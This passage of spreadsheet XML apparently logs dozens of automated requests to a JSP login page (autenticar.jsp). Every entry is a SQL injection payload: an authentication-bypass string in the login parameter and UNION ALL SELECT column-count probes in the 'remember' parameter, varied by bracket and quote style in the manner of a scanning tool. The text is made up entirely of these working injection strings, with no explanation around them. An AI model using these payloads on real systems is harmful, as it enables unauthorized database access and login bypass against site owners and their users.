    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselect1752,1752,1752,1752,1752,1752,1752,1752,1752,1752,1752,1752,1752,1752,1752,1752,1752,1752,1752,1752,1752,1752,1752,1752,1752,1752,1752,1752,1752,1752,1752,1752,1752,1752,1752,1752,1752,1752,1752,1752,1752,1752,1752,1752,1752,1752--and((1957=1957&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselect6338,6338,6338,6338,6338,6338,6338,6338,6338,6338,6338,6338,6338,6338,6338,6338,6338,6338,6338,6338,6338,6338,6338,6338,6338,6338,6338,6338,6338,6338,6338,6338,6338,6338,6338,6338,6338,6338,6338,6338,6338,6338,6338,6338,6338,6338,6338--and((3599=3599&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselect7185,7185,7185,7185,7185,7185,7185,7185,7185,7185,7185,7185,7185,7185,7185,7185,7185,7185,7185,7185,7185,7185,7185,7185,7185,7185,7185,7185,7185,7185,7185,7185,7185,7185,7185,7185,7185,7185,7185,7185,7185,7185,7185,7185,7185,7185,7185,7185--and((1289=1289&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselect5345,5345,5345,5345,5345,5345,5345,5345,5345,5345,5345,5345,5345,5345,5345,5345,5345,5345,5345,5345,5345,5345,5345,5345,5345,5345,5345,5345,5345,5345,5345,5345,5345,5345,5345,5345,5345,5345,5345,5345,5345,5345,5345,5345,5345,5345,5345,5345,5345--and((972=972&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=))unionallselect8330,8330,8330,8330,8330,8330,8330,8330,8330,8330,8330,8330,8330,8330,8330,8330,8330,8330,8330,8330,8330,8330,8330,8330,8330,8330,8330,8330,8330,8330,8330,8330,8330,8330,8330,8330,8330,8330,8330,8330,8330,8330,8330,8330,8330,8330,8330,8330,8330,8330--and((399=399&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselect7002,7002,7002,7002,7002,7002,7002,7002,7002,7002,7002,7002,7002,7002,7002,7002,7002,7002,7002,7002,7002,7002,7002,7002,7002,7002,7002,7002,7002,7002,7002,7002,7002,7002,7002,7002,7002,7002,7002,7002,7002--and(((3773=3773&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselect8483,8483,8483,8483,8483,8483,8483,8483,8483,8483,8483,8483,8483,8483,8483,8483,8483,8483,8483,8483,8483,8483,8483,8483,8483,8483,8483,8483,8483,8483,8483,8483,8483,8483,8483,8483,8483,8483,8483,8483,8483,8483--and(((6312=6312&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselect2806,2806,2806,2806,2806,2806,2806,2806,2806,2806,2806,2806,2806,2806,2806,2806,2806,2806,2806,2806,2806,2806,2806,2806,2806,2806,2806,2806,2806,2806,2806,2806,2806,2806,2806,2806,2806,2806,2806,2806,2806,2806,2806--and(((4192=4192&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselect9847,9847,9847,9847,9847,9847,9847,9847,9847,9847,9847,9847,9847,9847,9847,9847,9847,9847,9847,9847,9847,9847,9847,9847,9847,9847,9847,9847,9847,9847,9847,9847,9847,9847,9847,9847,9847,9847,9847,9847,9847,9847,9847,9847--and(((8444=8444&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselect5949,5949,5949,5949,5949,5949,5949,5949,5949,5949,5949,5949,5949,5949,5949,5949,5949,5949,5949,5949,5949,5949,5949,5949,5949,5949,5949,5949,5949,5949,5949,5949,5949,5949,5949,5949,5949,5949,5949,5949,5949,5949,5949,5949,5949--and(((2891=2891&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselect9255,9255,9255,9255,9255,9255,9255,9255,9255,9255,9255,9255,9255,9255,9255,9255,9255,9255,9255,9255,9255,9255,9255,9255,9255,9255,9255,9255,9255,9255,9255,9255,9255,9255,9255,9255,9255,9255,9255,9255,9255,9255,9255,9255,9255,9255--and(((2963=2963&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselect9565,9565,9565,9565,9565,9565,9565,9565,9565,9565,9565,9565,9565,9565,9565,9565,9565,9565,9565,9565,9565,9565,9565,9565,9565,9565,9565,9565,9565,9565,9565,9565,9565,9565,9565,9565,9565,9565,9565,9565,9565,9565,9565,9565,9565,9565,9565--and(((8844=8844&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselect1080,1080,1080,1080,1080,1080,1080,1080,1080,1080,1080,1080,1080,1080,1080,1080,1080,1080,1080,1080,1080,1080,1080,1080,1080,1080,1080,1080,1080,1080,1080,1080,1080,1080,1080,1080,1080,1080,1080,1080,1080,1080,1080,1080,1080,1080,1080,1080--and(((3478=3478&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselect2607,2607,2607,2607,2607,2607,2607,2607,2607,2607,2607,2607,2607,2607,2607,2607,2607,2607,2607,2607,2607,2607,2607,2607,2607,2607,2607,2607,2607,2607,2607,2607,2607,2607,2607,2607,2607,2607,2607,2607,2607,2607,2607,2607,2607,2607,2607,2607,2607--and(((1071=1071&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=)))unionallselect5836,5836,5836,5836,5836,5836,5836,5836,5836,5836,5836,5836,5836,5836,5836,5836,5836,5836,5836,5836,5836,5836,5836,5836,5836,5836,5836,5836,5836,5836,5836,5836,5836,5836,5836,5836,5836,5836,5836,5836,5836,5836,5836,5836,5836,5836,5836,5836,5836,5836--and(((5449=5449&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=unionallselect2351,2351,2351,2351,2351,2351,2351,2351,2351,2351,2351,2351,2351,2351,2351,2351,2351,2351,2351,2351,2351,2351,2351,2351,2351,2351,2351,2351,2351,2351,2351,2351,2351,2351,2351,2351,2351,2351,2351,2351,2351--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=unionallselect8936,8936,8936,8936,8936,8936,8936,8936,8936,8936,8936,8936,8936,8936,8936,8936,8936,8936,8936,8936,8936,8936,8936,8936,8936,8936,8936,8936,8936,8936,8936,8936,8936,8936,8936,8936,8936,8936,8936,8936,8936,8936--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=unionallselect3340,3340,3340,3340,3340,3340,3340,3340,3340,3340,3340,3340,3340,3340,3340,3340,3340,3340,3340,3340,3340,3340,3340,3340,3340,3340,3340,3340,3340,3340,3340,3340,3340,3340,3340,3340,3340,3340,3340,3340,3340,3340,3340--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=unionallselect8006,8006,8006,8006,8006,8006,8006,8006,8006,8006,8006,8006,8006,8006,8006,8006,8006,8006,8006,8006,8006,8006,8006,8006,8006,8006,8006,8006,8006,8006,8006,8006,8006,8006,8006,8006,8006,8006,8006,8006,8006,8006,8006,8006--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=unionallselect3266,3266,3266,3266,3266,3266,3266,3266,3266,3266,3266,3266,3266,3266,3266,3266,3266,3266,3266,3266,3266,3266,3266,3266,3266,3266,3266,3266,3266,3266,3266,3266,3266,3266,3266,3266,3266,3266,3266,3266,3266,3266,3266,3266,3266--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=unionallselect1929,1929,1929,1929,1929,1929,1929,1929,1929,1929,1929,1929,1929,1929,1929,1929,1929,1929,1929,1929,1929,1929,1929,1929,1929,1929,1929,1929,1929,1929,1929,1929,1929,1929,1929,1929,1929,1929,1929,1929,1929,1929,1929,1929,1929,1929--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=unionallselect2705,2705,2705,2705,2705,2705,2705,2705,2705,2705,2705,2705,2705,2705,2705,2705,2705,2705,2705,2705,2705,2705,2705,2705,2705,2705,2705,2705,2705,2705,2705,2705,2705,2705,2705,2705,2705,2705,2705,2705,2705,2705,2705,2705,2705,2705,2705--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=unionallselect6843,6843,6843,6843,6843,6843,6843,6843,6843,6843,6843,6843,6843,6843,6843,6843,6843,6843,6843,6843,6843,6843,6843,6843,6843,6843,6843,6843,6843,6843,6843,6843,6843,6843,6843,6843,6843,6843,6843,6843,6843,6843,6843,6843,6843,6843,6843,6843--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=unionallselect2671,2671,2671,2671,2671,2671,2671,2671,2671,2671,2671,2671,2671,2671,2671,2671,2671,2671,2671,2671,2671,2671,2671,2671,2671,2671,2671,2671,2671,2671,2671,2671,2671,2671,2671,2671,2671,2671,2671,2671,2671,2671,2671,2671,2671,2671,2671,2671,2671--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=unionallselect1811,1811,1811,1811,1811,1811,1811,1811,1811,1811,1811,1811,1811,1811,1811,1811,1811,1811,1811,1811,1811,1811,1811,1811,1811,1811,1811,1811,1811,1811,1811,1811,1811,1811,1811,1811,1811,1811,1811,1811,1811,1811,1811,1811,1811,1811,1811,1811,1811,1811--&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect9812,9812,9812,9812,9812,9812,9812,9812,9812,9812,9812,9812,9812,9812,9812,9812,9812,9812,9812,9812,9812,9812,9812,9812,9812,9812,9812,9812,9812,9812,9812,9812,9812,9812,9812,9812,9812,9812,9812,9812,9812--and('xmxi'='xmxi&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect2828,2828,2828,2828,2828,2828,2828,2828,2828,2828,2828,2828,2828,2828,2828,2828,2828,2828,2828,2828,2828,2828,2828,2828,2828,2828,2828,2828,2828,2828,2828,2828,2828,2828,2828,2828,2828,2828,2828,2828,2828,2828--and('fghq'='fghq&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect420,420,420,420,420,420,420,420,420,420,420,420,420,420,420,420,420,420,420,420,420,420,420,420,420,420,420,420,420,420,420,420,420,420,420,420,420,420,420,420,420,420,420--and('phnu'='phnu&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect8902,8902,8902,8902,8902,8902,8902,8902,8902,8902,8902,8902,8902,8902,8902,8902,8902,8902,8902,8902,8902,8902,8902,8902,8902,8902,8902,8902,8902,8902,8902,8902,8902,8902,8902,8902,8902,8902,8902,8902,8902,8902,8902,8902--and('vuax'='vuax&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect8892,8892,8892,8892,8892,8892,8892,8892,8892,8892,8892,8892,8892,8892,8892,8892,8892,8892,8892,8892,8892,8892,8892,8892,8892,8892,8892,8892,8892,8892,8892,8892,8892,8892,8892,8892,8892,8892,8892,8892,8892,8892,8892,8892,8892--and('zsru'='zsru&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect332,332,332,332,332,332,332,332,332,332,332,332,332,332,332,332,332,332,332,332,332,332,332,332,332,332,332,332,332,332,332,332,332,332,332,332,332,332,332,332,332,332,332,332,332,332--and('qmbr'='qmbr&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect7537,7537,7537,7537,7537,7537,7537,7537,7537,7537,7537,7537,7537,7537,7537,7537,7537,7537,7537,7537,7537,7537,7537,7537,7537,7537,7537,7537,7537,7537,7537,7537,7537,7537,7537,7537,7537,7537,7537,7537,7537,7537,7537,7537,7537,7537,7537--and('qroi'='qroi&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect301,301,301,301,301,301,301,301,301,301,301,301,301,301,301,301,301,301,301,301,301,301,301,301,301,301,301,301,301,301,301,301,301,301,301,301,301,301,301,301,301,301,301,301,301,301,301,301--and('qvyf'='qvyf&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect9000,9000,9000,9000,9000,9000,9000,9000,9000,9000,9000,9000,9000,9000,9000,9000,9000,9000,9000,9000,9000,9000,9000,9000,9000,9000,9000,9000,9000,9000,9000,9000,9000,9000,9000,9000,9000,9000,9000,9000,9000,9000,9000,9000,9000,9000,9000,9000,9000--and('rhdi'='rhdi&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect1611,1611,1611,1611,1611,1611,1611,1611,1611,1611,1611,1611,1611,1611,1611,1611,1611,1611,1611,1611,1611,1611,1611,1611,1611,1611,1611,1611,1611,1611,1611,1611,1611,1611,1611,1611,1611,1611,1611,1611,1611,1611,1611,1611,1611,1611,1611,1611,1611,1611--and('fyce'='fyce&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect3431,3431,3431,3431,3431,3431,3431,3431,3431,3431,3431,3431,3431,3431,3431,3431,3431,3431,3431,3431,3431,3431,3431,3431,3431,3431,3431,3431,3431,3431,3431,3431,3431,3431,3431,3431,3431,3431,3431,3431,3431--and(('exhc'='exhc&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect1009,1009,1009,1009,1009,1009,1009,1009,1009,1009,1009,1009,1009,1009,1009,1009,1009,1009,1009,1009,1009,1009,1009,1009,1009,1009,1009,1009,1009,1009,1009,1009,1009,1009,1009,1009,1009,1009,1009,1009,1009,1009--and(('mmso'='mmso&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect3199,3199,3199,3199,3199,3199,3199,3199,3199,3199,3199,3199,3199,3199,3199,3199,3199,3199,3199,3199,3199,3199,3199,3199,3199,3199,3199,3199,3199,3199,3199,3199,3199,3199,3199,3199,3199,3199,3199,3199,3199,3199,3199--and(('kahn'='kahn&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect1377,1377,1377,1377,1377,1377,1377,1377,1377,1377,1377,1377,1377,1377,1377,1377,1377,1377,1377,1377,1377,1377,1377,1377,1377,1377,1377,1377,1377,1377,1377,1377,1377,1377,1377,1377,1377,1377,1377,1377,1377,1377,1377,1377--and(('sygu'='sygu&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect7646,7646,7646,7646,7646,7646,7646,7646,7646,7646,7646,7646,7646,7646,7646,7646,7646,7646,7646,7646,7646,7646,7646,7646,7646,7646,7646,7646,7646,7646,7646,7646,7646,7646,7646,7646,7646,7646,7646,7646,7646,7646,7646,7646,7646--and(('kulg'='kulg&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect4288,4288,4288,4288,4288,4288,4288,4288,4288,4288,4288,4288,4288,4288,4288,4288,4288,4288,4288,4288,4288,4288,4288,4288,4288,4288,4288,4288,4288,4288,4288,4288,4288,4288,4288,4288,4288,4288,4288,4288,4288,4288,4288,4288,4288,4288--and(('hrhq'='hrhq&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect831,831,831,831,831,831,831,831,831,831,831,831,831,831,831,831,831,831,831,831,831,831,831,831,831,831,831,831,831,831,831,831,831,831,831,831,831,831,831,831,831,831,831,831,831,831,831--and(('cash'='cash&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect3156,3156,3156,3156,3156,3156,3156,3156,3156,3156,3156,3156,3156,3156,3156,3156,3156,3156,3156,3156,3156,3156,3156,3156,3156,3156,3156,3156,3156,3156,3156,3156,3156,3156,3156,3156,3156,3156,3156,3156,3156,3156,3156,3156,3156,3156,3156,3156--and(('kzks'='kzks&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect7859,7859,7859,7859,7859,7859,7859,7859,7859,7859,7859,7859,7859,7859,7859,7859,7859,7859,7859,7859,7859,7859,7859,7859,7859,7859,7859,7859,7859,7859,7859,7859,7859,7859,7859,7859,7859,7859,7859,7859,7859,7859,7859,7859,7859,7859,7859,7859,7859--and(('ocdh'='ocdh&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselect217,217,217,217,217,217,217,217,217,217,217,217,217,217,217,217,217,217,217,217,217,217,217,217,217,217,217,217,217,217,217,217,217,217,217,217,217,217,217,217,217,217,217,217,217,217,217,217,217,217--and(('gmxg'='gmxg&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect6416,6416,6416,6416,6416,6416,6416,6416,6416,6416,6416,6416,6416,6416,6416,6416,6416,6416,6416,6416,6416,6416,6416,6416,6416,6416,6416,6416,6416,6416,6416,6416,6416,6416,6416,6416,6416,6416,6416,6416,6416--and((('ufbc'='ufbc&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect5865,5865,5865,5865,5865,5865,5865,5865,5865,5865,5865,5865,5865,5865,5865,5865,5865,5865,5865,5865,5865,5865,5865,5865,5865,5865,5865,5865,5865,5865,5865,5865,5865,5865,5865,5865,5865,5865,5865,5865,5865,5865--and((('qqth'='qqth&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect2950,2950,2950,2950,2950,2950,2950,2950,2950,2950,2950,2950,2950,2950,2950,2950,2950,2950,2950,2950,2950,2950,2950,2950,2950,2950,2950,2950,2950,2950,2950,2950,2950,2950,2950,2950,2950,2950,2950,2950,2950,2950,2950--and((('pprm'='pprm&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect9782,9782,9782,9782,9782,9782,9782,9782,9782,9782,9782,9782,9782,9782,9782,9782,9782,9782,9782,9782,9782,9782,9782,9782,9782,9782,9782,9782,9782,9782,9782,9782,9782,9782,9782,9782,9782,9782,9782,9782,9782,9782,9782,9782--and((('vixd'='vixd&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect1483,1483,1483,1483,1483,1483,1483,1483,1483,1483,1483,1483,1483,1483,1483,1483,1483,1483,1483,1483,1483,1483,1483,1483,1483,1483,1483,1483,1483,1483,1483,1483,1483,1483,1483,1483,1483,1483,1483,1483,1483,1483,1483,1483,1483--and((('yisv'='yisv&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect3879,3879,3879,3879,3879,3879,3879,3879,3879,3879,3879,3879,3879,3879,3879,3879,3879,3879,3879,3879,3879,3879,3879,3879,3879,3879,3879,3879,3879,3879,3879,3879,3879,3879,3879,3879,3879,3879,3879,3879,3879,3879,3879,3879,3879,3879--and((('fpto'='fpto&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect7407,7407,7407,7407,7407,7407,7407,7407,7407,7407,7407,7407,7407,7407,7407,7407,7407,7407,7407,7407,7407,7407,7407,7407,7407,7407,7407,7407,7407,7407,7407,7407,7407,7407,7407,7407,7407,7407,7407,7407,7407,7407,7407,7407,7407,7407,7407--and((('epdc'='epdc&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect6769,6769,6769,6769,6769,6769,6769,6769,6769,6769,6769,6769,6769,6769,6769,6769,6769,6769,6769,6769,6769,6769,6769,6769,6769,6769,6769,6769,6769,6769,6769,6769,6769,6769,6769,6769,6769,6769,6769,6769,6769,6769,6769,6769,6769,6769,6769,6769--and((('vkrm'='vkrm&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect5464,5464,5464,5464,5464,5464,5464,5464,5464,5464,5464,5464,5464,5464,5464,5464,5464,5464,5464,5464,5464,5464,5464,5464,5464,5464,5464,5464,5464,5464,5464,5464,5464,5464,5464,5464,5464,5464,5464,5464,5464,5464,5464,5464,5464,5464,5464,5464,5464--and((('rsck'='rsck&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselect1110,1110,1110,1110,1110,1110,1110,1110,1110,1110,1110,1110,1110,1110,1110,1110,1110,1110,1110,1110,1110,1110,1110,1110,1110,1110,1110,1110,1110,1110,1110,1110,1110,1110,1110,1110,1110,1110,1110,1110,1110,1110,1110,1110,1110,1110,1110,1110,1110,1110--and((('uuex'='uuex&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect1977,1977,1977,1977,1977,1977,1977,1977,1977,1977,1977,1977,1977,1977,1977,1977,1977,1977,1977,1977,1977,1977,1977,1977,1977,1977,1977,1977,1977,1977,1977,1977,1977,1977,1977,1977,1977,1977,1977,1977,1977--and'qdxv'='qdxv&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect7410,7410,7410,7410,7410,7410,7410,7410,7410,7410,7410,7410,7410,7410,7410,7410,7410,7410,7410,7410,7410,7410,7410,7410,7410,7410,7410,7410,7410,7410,7410,7410,7410,7410,7410,7410,7410,7410,7410,7410,7410,7410--and'nwml'='nwml&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect3416,3416,3416,3416,3416,3416,3416,3416,3416,3416,3416,3416,3416,3416,3416,3416,3416,3416,3416,3416,3416,3416,3416,3416,3416,3416,3416,3416,3416,3416,3416,3416,3416,3416,3416,3416,3416,3416,3416,3416,3416,3416,3416--and'cscw'='cscw&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect3080,3080,3080,3080,3080,3080,3080,3080,3080,3080,3080,3080,3080,3080,3080,3080,3080,3080,3080,3080,3080,3080,3080,3080,3080,3080,3080,3080,3080,3080,3080,3080,3080,3080,3080,3080,3080,3080,3080,3080,3080,3080,3080,3080--and'exub'='exub&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect2373,2373,2373,2373,2373,2373,2373,2373,2373,2373,2373,2373,2373,2373,2373,2373,2373,2373,2373,2373,2373,2373,2373,2373,2373,2373,2373,2373,2373,2373,2373,2373,2373,2373,2373,2373,2373,2373,2373,2373,2373,2373,2373,2373,2373--and'uaav'='uaav&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect711,711,711,711,711,711,711,711,711,711,711,711,711,711,711,711,711,711,711,711,711,711,711,711,711,711,711,711,711,711,711,711,711,711,711,711,711,711,711,711,711,711,711,711,711,711--and'axcn'='axcn&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect6938,6938,6938,6938,6938,6938,6938,6938,6938,6938,6938,6938,6938,6938,6938,6938,6938,6938,6938,6938,6938,6938,6938,6938,6938,6938,6938,6938,6938,6938,6938,6938,6938,6938,6938,6938,6938,6938,6938,6938,6938,6938,6938,6938,6938,6938,6938--and'ouoo'='ouoo&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect1360,1360,1360,1360,1360,1360,1360,1360,1360,1360,1360,1360,1360,1360,1360,1360,1360,1360,1360,1360,1360,1360,1360,1360,1360,1360,1360,1360,1360,1360,1360,1360,1360,1360,1360,1360,1360,1360,1360,1360,1360,1360,1360,1360,1360,1360,1360,1360--and'nsyp'='nsyp&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect8960,8960,8960,8960,8960,8960,8960,8960,8960,8960,8960,8960,8960,8960,8960,8960,8960,8960,8960,8960,8960,8960,8960,8960,8960,8960,8960,8960,8960,8960,8960,8960,8960,8960,8960,8960,8960,8960,8960,8960,8960,8960,8960,8960,8960,8960,8960,8960,8960--and'ymcg'='ymcg&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselect700,700,700,700,700,700,700,700,700,700,700,700,700,700,700,700,700,700,700,700,700,700,700,700,700,700,700,700,700,700,700,700,700,700,700,700,700,700,700,700,700,700,700,700,700,700,700,700,700,700--and'fjrb'='fjrb&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58,58--and('attn'like'attn&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselect1505,1505,1505,1505,1505,1505,1505,1505,1505,1505,1505,1505,1505,1505,1505,1505,1505,1505,1505,1505,1505,1505,1505,1505,1505,1505,1505,1505,1505,1505,1505,1505,1505,1505,1505,1505,1505,1505,1505,1505,1505,1505--and('gjut'like'gjut&amp;modo=entrar</t>
  </si>
  <si>
